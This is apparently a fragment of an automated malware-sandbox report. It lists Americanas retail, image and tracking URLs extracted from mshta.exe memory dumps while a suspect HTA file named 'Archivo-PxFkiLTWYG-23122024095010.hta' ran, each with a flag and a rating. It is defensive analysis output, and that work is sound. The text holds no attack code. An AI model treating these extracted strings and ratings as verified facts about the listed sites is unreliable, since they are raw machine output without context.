00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                            high
                                                                            https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chavemshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edommshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770422568.000000000929A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714183267.0000000009A53000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfridaymshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655302428.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                  high
                                                                                  https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png96648a2579.pmshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvsmeta.largemeta.large.heimshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.americanas.com.br/categoria/mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=lmshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777180906.000000000C30B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2752157960.000000000C30A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://trg.adilligo.com/RemarketingList?lmshta.exe, 00000000.00000003.2721943484.00000000095E5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2136389108.0000000006500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2138879620.00000000095E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_UD-fe20595d366f.pngmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766365966.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.pngmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoesmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                  unknown
                                                                                                  https://ri.americanas.io/-mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wadmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643100035.0000000009813000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751370436.000000000A9EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642997021.0000000009884000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642800669.0000000009875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643227447.0000000009817000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657750155.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643280436.0000000009818000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642855658.0000000009877000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643583993.0000000009823000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643181884.0000000009815000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642752424.0000000009874000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744061643.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643488330.000000000981D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maquimshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                        high
                                                                                                        https://www.americanas.com.br/?utm_source=web_app_manifestmshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769621202.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727460305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776109405.000000000C0C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747509040.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668705608.000000000C0C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770024098.0000000009210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menumshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://canaldedenuncias.com.br/universoamericanas/8mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745817185.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747706873.000000000C29F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menumshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                high
